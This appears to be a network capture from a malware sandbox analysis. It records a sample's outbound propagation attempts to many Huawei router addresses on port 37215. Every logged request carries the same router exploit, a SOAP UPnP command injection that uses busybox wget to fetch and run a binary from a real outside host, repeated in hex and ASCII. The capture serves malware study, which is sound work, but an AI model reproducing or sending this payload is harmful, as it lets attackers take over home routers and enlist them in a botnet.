                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            67192.168.2.153359441.31.62.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.732984066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            68192.168.2.153968241.1.204.18237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733027935 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            69192.168.2.154130641.23.5.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733052969 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            70192.168.2.155134041.141.140.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733061075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            71192.168.2.154753241.181.2.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733061075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            72192.168.2.154105441.187.101.23337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733072996 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            73192.168.2.155161041.99.124.9737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733115911 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            74192.168.2.153956841.159.234.25137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733148098 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            75192.168.2.155400041.207.57.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733161926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            76192.168.2.153547441.107.89.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:04.733212948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 